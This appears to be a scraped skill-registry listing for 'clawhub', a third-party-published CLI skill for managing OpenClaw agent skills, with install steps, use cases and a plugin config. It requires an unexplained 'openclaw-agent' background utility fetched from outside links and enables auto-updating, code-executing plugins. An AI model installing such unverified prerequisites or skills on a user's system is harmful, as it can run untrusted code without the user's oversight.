clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
Why use this skill?
Use ClawHub to search, install, update, and publish OpenClaw agent skills. Streamline your AI workflow with a powerful, command-line skill management system.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/clawhub-f3qcnWhat This Skill Does
The clawhub skill provides an interface to interact with the ClawHub CLI, a powerful package manager designed specifically for OpenClaw AI agent skills. By utilizing this tool, you can seamlessly search, install, maintain, and publish modular skills directly from the command line. Whether you are an end-user looking to expand your agent's capabilities with community-contributed skills or a developer aiming to distribute your own custom-built functionalities, clawhub acts as the central hub for managing your agent's ecosystem. It ensures that your local skill environment stays synchronized with the latest versions and allows for rapid deployment through its built-in publishing workflow.
Installation
To begin, ensure you have the required openclaw-agent utility installed and running on your system (see the repository links for Windows/macOS specific instructions). Once the agent is active, install the CLI globally via npm:
npm i -g clawhub
After installation, verify your environment by running clawhub whoami. For those planning to publish skills, ensure you have completed the clawhub login process to authenticate your session with the registry.
Use Cases
- Expanding Capabilities: Quickly fetch and install specialized skills like "postgres backups" or data processing utilities without manual file management.
- Version Control: Manage multiple iterations of a skill, allowing you to pin specific versions to ensure environment stability or upgrade all installed skills to their latest releases with a single command.
- Skill Distribution: Developers can share their creations with the OpenClaw community by using the
publishcommand, which bundles and registers your local skill folders to the central repository. - Environment Syncing: Maintain a consistent set of agent tools across different workstations by listing and updating skills in batches.
Example Prompts
- "Search the ClawHub registry for any skills related to postgres database backups."
- "Install the latest version of the web-scraper skill to my local directory."
- "Update all my installed skills to the newest version, skipping any confirmation prompts."
Tips & Limitations
Always ensure the openclaw-agent is running; the clawhub command will fail without this background process. If you encounter issues during installation, check your network connection and verify your clawhub_REGISTRY environment variable. Note that the default installation directory is ./skills, though you can override this using the --dir flag. When publishing, always provide a clear and concise changelog to help other users understand the updates you have implemented.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-clawhub-f3qcn": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, file-read, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.